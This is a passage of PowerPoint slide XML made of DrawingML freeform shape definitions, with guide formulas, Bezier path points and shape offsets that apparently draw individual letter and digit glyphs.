                <a:gd name="T5" fmla="*/ 32 h 335"/>
                <a:gd name="T6" fmla="*/ 150 w 240"/>
                <a:gd name="T7" fmla="*/ 82 h 335"/>
                <a:gd name="T8" fmla="*/ 102 w 240"/>
                <a:gd name="T9" fmla="*/ 133 h 335"/>
                <a:gd name="T10" fmla="*/ 57 w 240"/>
                <a:gd name="T11" fmla="*/ 150 h 335"/>
                <a:gd name="T12" fmla="*/ 102 w 240"/>
                <a:gd name="T13" fmla="*/ 163 h 335"/>
                <a:gd name="T14" fmla="*/ 184 w 240"/>
                <a:gd name="T15" fmla="*/ 82 h 335"/>
                <a:gd name="T16" fmla="*/ 171 w 240"/>
                <a:gd name="T17" fmla="*/ 39 h 335"/>
                <a:gd name="T18" fmla="*/ 200 w 240"/>
                <a:gd name="T19" fmla="*/ 30 h 335"/>
                <a:gd name="T20" fmla="*/ 220 w 240"/>
                <a:gd name="T21" fmla="*/ 47 h 335"/>
                <a:gd name="T22" fmla="*/ 240 w 240"/>
                <a:gd name="T23" fmla="*/ 27 h 335"/>
                <a:gd name="T24" fmla="*/ 203 w 240"/>
                <a:gd name="T25" fmla="*/ 0 h 335"/>
                <a:gd name="T26" fmla="*/ 151 w 240"/>
                <a:gd name="T27" fmla="*/ 18 h 335"/>
                <a:gd name="T28" fmla="*/ 102 w 240"/>
                <a:gd name="T29" fmla="*/ 3 h 335"/>
                <a:gd name="T30" fmla="*/ 20 w 240"/>
                <a:gd name="T31" fmla="*/ 82 h 335"/>
                <a:gd name="T32" fmla="*/ 36 w 240"/>
                <a:gd name="T33" fmla="*/ 130 h 335"/>
                <a:gd name="T34" fmla="*/ 26 w 240"/>
                <a:gd name="T35" fmla="*/ 164 h 335"/>
                <a:gd name="T36" fmla="*/ 37 w 240"/>
                <a:gd name="T37" fmla="*/ 200 h 335"/>
                <a:gd name="T38" fmla="*/ 0 w 240"/>
                <a:gd name="T39" fmla="*/ 261 h 335"/>
                <a:gd name="T40" fmla="*/ 117 w 240"/>
                <a:gd name="T41" fmla="*/ 335 h 335"/>
                <a:gd name="T42" fmla="*/ 233 w 240"/>
                <a:gd name="T43" fmla="*/ 261 h 335"/>
                <a:gd name="T44" fmla="*/ 198 w 240"/>
                <a:gd name="T45" fmla="*/ 204 h 335"/>
                <a:gd name="T46" fmla="*/ 126 w 240"/>
                <a:gd name="T47" fmla="*/ 190 h 335"/>
                <a:gd name="T48" fmla="*/ 91 w 240"/>
                <a:gd name="T49" fmla="*/ 190 h 335"/>
                <a:gd name="T50" fmla="*/ 77 w 240"/>
                <a:gd name="T51" fmla="*/ 189 h 335"/>
                <a:gd name="T52" fmla="*/ 60 w 240"/>
                <a:gd name="T53" fmla="*/ 182 h 335"/>
                <a:gd name="T54" fmla="*/ 54 w 240"/>
                <a:gd name="T55" fmla="*/ 164 h 335"/>
                <a:gd name="T56" fmla="*/ 57 w 240"/>
                <a:gd name="T57" fmla="*/ 150 h 335"/>
                <a:gd name="T58" fmla="*/ 117 w 240"/>
                <a:gd name="T59" fmla="*/ 305 h 335"/>
                <a:gd name="T60" fmla="*/ 29 w 240"/>
                <a:gd name="T61" fmla="*/ 261 h 335"/>
                <a:gd name="T62" fmla="*/ 50 w 240"/>
                <a:gd name="T63" fmla="*/ 226 h 335"/>
                <a:gd name="T64" fmla="*/ 103 w 240"/>
                <a:gd name="T65" fmla="*/ 218 h 335"/>
                <a:gd name="T66" fmla="*/ 204 w 240"/>
                <a:gd name="T67" fmla="*/ 261 h 335"/>
                <a:gd name="T68" fmla="*/ 117 w 240"/>
                <a:gd name="T69" fmla="*/ 30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40" h="335">
                  <a:moveTo>
                    <a:pt x="102" y="133"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="133"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="102" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="32"/>
                    <a:pt x="150" y="56"/>
                    <a:pt x="150" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="111"/>
                    <a:pt x="128" y="133"/>
                    <a:pt x="102" y="133"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="151"/>
                    <a:pt x="78" y="163"/>
                    <a:pt x="102" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="163"/>
                    <a:pt x="184" y="127"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="180" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="33"/>
                    <a:pt x="194" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="215" y="47"/>
                    <a:pt x="220" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="240" y="41"/>
                    <a:pt x="240" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="16"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="0"/>
                    <a:pt x="173" y="1"/>
                    <a:pt x="151" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="12"/>
                    <a:pt x="125" y="3"/>
                    <a:pt x="102" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="20" y="40"/>
                    <a:pt x="20" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="36" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="138"/>
                    <a:pt x="26" y="149"/>
                    <a:pt x="26" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="181"/>
                    <a:pt x="33" y="194"/>
                    <a:pt x="37" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="53" y="335"/>
                    <a:pt x="117" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="335"/>
                    <a:pt x="233" y="304"/>
                    <a:pt x="233" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233" y="243"/>
                    <a:pt x="224" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="201"/>
                    <a:pt x="171" y="190"/>
                    <a:pt x="126" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="91" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="81" y="190"/>
                    <a:pt x="77" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="117" y="305"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="305"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="50" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="67" y="218"/>
                    <a:pt x="103" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="218"/>
                    <a:pt x="204" y="218"/>
                    <a:pt x="204" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="283"/>
                    <a:pt x="166" y="305"/>
                    <a:pt x="117" y="30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58" name="Freeform 899">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1611D626-001A-434E-8A32-8E804CD17A8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId75"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4706938" y="2106613"/>
              <a:ext cx="76200" cy="111125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 166 w 218"/>
                <a:gd name="T1" fmla="*/ 38 h 318"/>
                <a:gd name="T2" fmla="*/ 63 w 218"/>
                <a:gd name="T3" fmla="*/ 295 h 318"/>
                <a:gd name="T4" fmla="*/ 81 w 218"/>
                <a:gd name="T5" fmla="*/ 318 h 318"/>
                <a:gd name="T6" fmla="*/ 98 w 218"/>
                <a:gd name="T7" fmla="*/ 298 h 318"/>
                <a:gd name="T8" fmla="*/ 207 w 218"/>
                <a:gd name="T9" fmla="*/ 40 h 318"/>
                <a:gd name="T10" fmla="*/ 218 w 218"/>
                <a:gd name="T11" fmla="*/ 23 h 318"/>
                <a:gd name="T12" fmla="*/ 198 w 218"/>
                <a:gd name="T13" fmla="*/ 8 h 318"/>
                <a:gd name="T14" fmla="*/ 33 w 218"/>
                <a:gd name="T15" fmla="*/ 8 h 318"/>
                <a:gd name="T16" fmla="*/ 17 w 218"/>
                <a:gd name="T17" fmla="*/ 0 h 318"/>
                <a:gd name="T18" fmla="*/ 0 w 218"/>
                <a:gd name="T19" fmla="*/ 20 h 318"/>
                <a:gd name="T20" fmla="*/ 0 w 218"/>
                <a:gd name="T21" fmla="*/ 41 h 318"/>
                <a:gd name="T22" fmla="*/ 17 w 218"/>
                <a:gd name="T23" fmla="*/ 62 h 318"/>
                <a:gd name="T24" fmla="*/ 35 w 218"/>
                <a:gd name="T25" fmla="*/ 38 h 318"/>
                <a:gd name="T26" fmla="*/ 166 w 218"/>
                <a:gd name="T27" fmla="*/ 3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 h="318">
                  <a:moveTo>
                    <a:pt x="166" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="130"/>
                    <a:pt x="63" y="240"/>
                    <a:pt x="63" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="301"/>
                    <a:pt x="63" y="318"/>
                    <a:pt x="81" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="318"/>
                    <a:pt x="98" y="312"/>
                    <a:pt x="98" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="156"/>
                    <a:pt x="176" y="70"/>
                    <a:pt x="207" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="31"/>
                    <a:pt x="218" y="30"/>
                    <a:pt x="218" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="8"/>
                    <a:pt x="206" y="8"/>
                    <a:pt x="198" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="33" y="8"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="21" y="0"/>
                    <a:pt x="17" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="11"/>
                    <a:pt x="0" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="41"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="51"/>
                    <a:pt x="0" y="62"/>
                    <a:pt x="17" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="62"/>
                    <a:pt x="35" y="52"/>
                    <a:pt x="35" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="166" y="3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59" name="Freeform 900">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004E2094-7071-457C-B91F-2CB305FFC5C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId76"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4799013" y="2108201"/>
              <a:ext cx="71438" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 158 h 316"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 316"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 158 h 316"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 316 h 316"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 158 h 316"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 286 h 316"/>
                <a:gd name="T12" fmla="*/ 40 w 205"/>
                <a:gd name="T13" fmla="*/ 250 h 316"/>
                <a:gd name="T14" fmla="*/ 34 w 205"/>
                <a:gd name="T15" fmla="*/ 154 h 316"/>
                <a:gd name="T16" fmla="*/ 40 w 205"/>
                <a:gd name="T17" fmla="*/ 66 h 316"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 31 h 316"/>
                <a:gd name="T20" fmla="*/ 165 w 205"/>
                <a:gd name="T21" fmla="*/ 63 h 316"/>
                <a:gd name="T22" fmla="*/ 171 w 205"/>
                <a:gd name="T23" fmla="*/ 154 h 316"/>
                <a:gd name="T24" fmla="*/ 165 w 205"/>
                <a:gd name="T25" fmla="*/ 247 h 316"/>
                <a:gd name="T26" fmla="*/ 103 w 205"/>
                <a:gd name="T27" fmla="*/ 28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5" h="316">
                  <a:moveTo>
                    <a:pt x="205" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="14"/>
                    <a:pt x="195" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="302"/>
                    <a:pt x="10" y="316"/>
                    <a:pt x="103" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="316"/>
                    <a:pt x="205" y="302"/>
                    <a:pt x="205" y="158"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="286"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="286"/>
                    <a:pt x="46" y="275"/>
                    <a:pt x="40" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="225"/>
                    <a:pt x="34" y="181"/>
                    <a:pt x="34" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="123"/>
                    <a:pt x="34" y="89"/>
                    <a:pt x="40" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="37"/>
                    <a:pt x="62" y="31"/>
                    <a:pt x="103" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="31"/>
                    <a:pt x="157" y="35"/>
                    <a:pt x="165" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="86"/>
                    <a:pt x="171" y="123"/>
                    <a:pt x="171" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="185"/>
                    <a:pt x="171" y="220"/>
                    <a:pt x="165" y="247"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="275"/>
                    <a:pt x="147" y="286"/>
                    <a:pt x="103" y="2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60" name="Freeform 901">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA7C5A36-CE72-43EA-BA64-542925F6B7C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId77"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4894263" y="2109788"/>
              <a:ext cx="63500" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 183"/>
                <a:gd name="T1" fmla="*/ 30 h 304"/>
                <a:gd name="T2" fmla="*/ 162 w 183"/>
                <a:gd name="T3" fmla="*/ 30 h 304"/>
                <a:gd name="T4" fmla="*/ 183 w 183"/>
                <a:gd name="T5" fmla="*/ 15 h 304"/>
                <a:gd name="T6" fmla="*/ 162 w 183"/>
                <a:gd name="T7" fmla="*/ 0 h 304"/>
                <a:gd name="T8" fmla="*/ 20 w 183"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 0 w 183"/>
                <a:gd name="T11" fmla="*/ 15 h 304"/>
                <a:gd name="T12" fmla="*/ 20 w 183"/>
                <a:gd name="T13" fmla="*/ 30 h 304"/>
                <a:gd name="T14" fmla="*/ 74 w 183"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 74 w 183"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 20 w 183"/>
                <a:gd name="T19" fmla="*/ 274 h 304"/>
                <a:gd name="T20" fmla="*/ 0 w 183"/>
                <a:gd name="T21" fmla="*/ 289 h 304"/>
                <a:gd name="T22" fmla="*/ 20 w 183"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 162 w 183"/>
                <a:gd name="T25" fmla="*/ 304 h 304"/>
                <a:gd name="T26" fmla="*/ 183 w 183"/>
                <a:gd name="T27" fmla="*/ 289 h 304"/>
                <a:gd name="T28" fmla="*/ 162 w 183"/>
                <a:gd name="T29" fmla="*/ 274 h 304"/>
                <a:gd name="T30" fmla="*/ 109 w 183"/>
                <a:gd name="T31" fmla="*/ 274 h 304"/>
                <a:gd name="T32" fmla="*/ 109 w 183"/>
                <a:gd name="T33" fmla="*/ 3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3" h="304">
                  <a:moveTo>
                    <a:pt x="109" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="162" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="30"/>
                    <a:pt x="183" y="30"/>
                    <a:pt x="183" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="0"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="162" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="13" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="162" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="304"/>
                    <a:pt x="183" y="304"/>
                    <a:pt x="183" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="274"/>
                    <a:pt x="170" y="274"/>
                    <a:pt x="162" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109"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61" name="Freeform 902">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FDF0BF1-C9A7-4CCF-A3C7-D3A7D182788A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId78"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4975226" y="2141538"/>
              <a:ext cx="80963" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 237"/>
                <a:gd name="T1" fmla="*/ 30 h 216"/>
                <a:gd name="T2" fmla="*/ 217 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 216"/>
                <a:gd name="T4" fmla="*/ 237 w 237"/>
                <a:gd name="T5" fmla="*/ 15 h 216"/>
                <a:gd name="T6" fmla="*/ 217 w 237"/>
                <a:gd name="T7" fmla="*/ 0 h 216"/>
                <a:gd name="T8" fmla="*/ 159 w 237"/>
                <a:gd name="T9" fmla="*/ 0 h 216"/>
                <a:gd name="T10" fmla="*/ 139 w 237"/>
                <a:gd name="T11" fmla="*/ 14 h 216"/>
                <a:gd name="T12" fmla="*/ 159 w 237"/>
                <a:gd name="T13" fmla="*/ 30 h 216"/>
                <a:gd name="T14" fmla="*/ 173 w 237"/>
                <a:gd name="T15" fmla="*/ 30 h 216"/>
                <a:gd name="T16" fmla="*/ 119 w 237"/>
                <a:gd name="T17" fmla="*/ 191 h 216"/>
                <a:gd name="T18" fmla="*/ 64 w 237"/>
                <a:gd name="T19" fmla="*/ 30 h 216"/>
                <a:gd name="T20" fmla="*/ 78 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 216"/>
                <a:gd name="T22" fmla="*/ 98 w 237"/>
                <a:gd name="T23" fmla="*/ 15 h 216"/>
                <a:gd name="T24" fmla="*/ 78 w 237"/>
                <a:gd name="T25" fmla="*/ 0 h 216"/>
                <a:gd name="T26" fmla="*/ 20 w 237"/>
                <a:gd name="T27" fmla="*/ 0 h 216"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 15 h 216"/>
                <a:gd name="T30" fmla="*/ 20 w 237"/>
                <a:gd name="T31" fmla="*/ 30 h 216"/>
                <a:gd name="T32" fmla="*/ 35 w 237"/>
                <a:gd name="T33" fmla="*/ 30 h 216"/>
                <a:gd name="T34" fmla="*/ 92 w 237"/>
                <a:gd name="T35" fmla="*/ 199 h 216"/>
                <a:gd name="T36" fmla="*/ 119 w 237"/>
                <a:gd name="T37" fmla="*/ 216 h 216"/>
                <a:gd name="T38" fmla="*/ 145 w 237"/>
                <a:gd name="T39" fmla="*/ 200 h 216"/>
                <a:gd name="T40" fmla="*/ 202 w 237"/>
                <a:gd name="T41" fmla="*/ 3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7" h="216">
                  <a:moveTo>
                    <a:pt x="202" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="217" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="30"/>
                    <a:pt x="237" y="30"/>
                    <a:pt x="237" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="0"/>
                    <a:pt x="225" y="0"/>
                    <a:pt x="217" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="30"/>
                    <a:pt x="151" y="30"/>
                    <a:pt x="159" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="199"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="216"/>
                    <a:pt x="108" y="216"/>
                    <a:pt x="119" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="216"/>
                    <a:pt x="140" y="216"/>
                    <a:pt x="145" y="200"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202"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62" name="Freeform 903">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D434D5B8-9338-40A3-9954-39388A6C39CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId79"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5064126" y="2141538"/>
              <a:ext cx="84138" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 245"/>
                <a:gd name="T1" fmla="*/ 30 h 216"/>
                <a:gd name="T2" fmla="*/ 245 w 245"/>
                <a:gd name="T3" fmla="*/ 14 h 216"/>
                <a:gd name="T4" fmla="*/ 224 w 245"/>
                <a:gd name="T5" fmla="*/ 0 h 216"/>
                <a:gd name="T6" fmla="*/ 167 w 245"/>
                <a:gd name="T7" fmla="*/ 0 h 216"/>
                <a:gd name="T8" fmla="*/ 146 w 245"/>
                <a:gd name="T9" fmla="*/ 14 h 216"/>
                <a:gd name="T10" fmla="*/ 167 w 245"/>
                <a:gd name="T11" fmla="*/ 30 h 216"/>
                <a:gd name="T12" fmla="*/ 191 w 245"/>
                <a:gd name="T13" fmla="*/ 30 h 216"/>
                <a:gd name="T14" fmla="*/ 166 w 245"/>
                <a:gd name="T15" fmla="*/ 179 h 216"/>
                <a:gd name="T16" fmla="*/ 166 w 245"/>
                <a:gd name="T17" fmla="*/ 179 h 216"/>
                <a:gd name="T18" fmla="*/ 151 w 245"/>
                <a:gd name="T19" fmla="*/ 122 h 216"/>
                <a:gd name="T20" fmla="*/ 123 w 245"/>
